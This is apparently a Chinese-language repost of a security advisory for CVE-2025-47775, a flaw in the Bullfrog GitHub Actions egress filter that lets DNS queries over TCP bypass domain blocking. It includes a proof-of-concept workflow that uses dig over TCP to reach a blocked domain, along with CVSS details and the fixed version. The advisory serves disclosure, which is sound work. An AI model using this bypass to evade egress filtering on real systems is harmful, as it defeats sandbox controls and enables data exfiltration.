Bullfrog DNS over TCP漏洞可绕过域名过滤机制

本文详细分析了CVE-2025-47775漏洞,该漏洞存在于Bullfrog的DNS over TCP实现中,允许攻击者通过TCP协议绕过域名过滤策略,进行DNS数据外泄。文章包含了漏洞概要、PoC复现步骤、影响评估及修复版本信息。

漏洞详情

CVE ID: CVE-2025-47775 GHSA ID: GHSA-m32f-fjw2-37v3 严重等级: 中等 (CVSS 评分: 6.2) 涉及组件: bullfrogsec/bullfrog (GitHub Actions) 受影响版本: < 0.8.4 已修复版本: 0.8.4

描述

概要 使用TCP协议会破坏域名阻断功能,并允许进行DNS数据外泄。

概念验证

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

name: test
on:
  push:
    branches:
      - "*"

jobs:
  testBullFrog:
    runs-on: ubuntu-22.04
    steps:
      - name: Use google dns
        run: |
          sudo resolvectl dns eth0 1.1.1.1
          resolvectl status
      - name: Set up bullfrog to block everything
        uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
        with:
           egress-policy: block
           allowed-domains: |
             *.github.com
      - name: Test connectivity
        run: |
          echo testing udp allowed ..
          dig api.github.com @1.1.1.1 || :
          echo testing tcp allowed ..
          dig api.github.com @1.1.1.1 +tcp || :

          echo testing udp not allowed
          dig api.google.com @1.1.1.1 || :
          echo testing tcp not allowed
          dig api.google.com @1.1.1.1 +tcp || :

影响 沙箱绕过。

相关链接

安全信息

发布时间线

  • 由 fallard84 发布至 bullfrogsec/bullfrog: 2025年5月14日
  • 由国家漏洞数据库发布: 2025年5月14日
  • 发布至GitHub Advisory Database: 2025年5月15日
  • 审核时间: 2025年5月15日
  • 最后更新: 2025年5月15日

CVSS v3 基本指标

  • 攻击向量 (AV): 本地
  • 攻击复杂度 (AC): 低
  • 所需权限 (PR): 无
  • 用户交互 (UI): 无
  • 范围 (S): 未更改
  • 机密性影响 (C): 高
  • 完整性影响 (I): 无
  • 可用性影响 (A): 无

CVSS向量字符串: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS 分数: 0.057% (第18百分位)

弱点

  • CWE-201: 将敏感信息插入发送的数据中。代码将数据传输给另一个参与者,但部分数据包含了不应被该参与者访问的敏感信息。

致谢 报告者: vin01

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次